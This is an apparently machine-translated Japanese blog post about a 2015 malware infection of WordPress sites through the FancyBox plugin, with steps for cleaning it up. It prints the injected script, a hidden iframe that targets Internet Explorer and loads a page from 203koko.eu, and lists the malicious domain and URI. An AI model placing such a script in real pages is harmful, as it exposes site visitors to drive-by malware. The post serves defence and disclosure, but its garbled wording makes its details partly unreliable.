今週初めのウェブサイトやブログの数を WordPress、から警告を受け取りました マルウェア感染 スルー グーグルのウェブマスター.
に問題 グーグルのウェブマスター の存在であると称される タラ / スクリプト iframeマルウェア ソースのウェブサイト。
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>それがあると思われる 脆弱性 a プラグインアキ ファンシーボックス用 WordPress これは昨日まで(05.02.2015)は長い間更新されていませんでした。
この問題を解決し、 ウイルスサイトを消毒 このマルウェアは比較的簡単です。
1.FancyBoxプラグインを無効にします。
2。 FTPからすべてのFancyBoxプラグインファイルをサーバーから削除する
3.新しいバージョンのプラグインをインストールします(Fancybox 3.0.4)
ファンシーボックス用 WordPress 3.0.4
-3.0.3で説明したセキュリティ問題の影響を受ける設定の名前を変更しました。 これにより、プラグインが存在するサイトに悪意のあるコードが表示されるのを防ぐことができます。 updated悪意のあるコードを削除せずに。
ファンシーボックス用 WordPress 3.0.3
– セキュリティ上の問題を修正しました.
マルウェア情報:
TYPE:インラインフレームのリダイレクト
TARGET: WordPress Fancybox
マルウェアDOMAIN:203koko.eu
マルウェアURI:http://203koko.eu/hjnfh/ipframe2.php
マルウェア RAW コード:
書かれたマルウェア: if (navigator.userAgent.match(/msie/i)) { document.write(‘
あなたからマルウェアを削除します WordPress ウェブサイト.
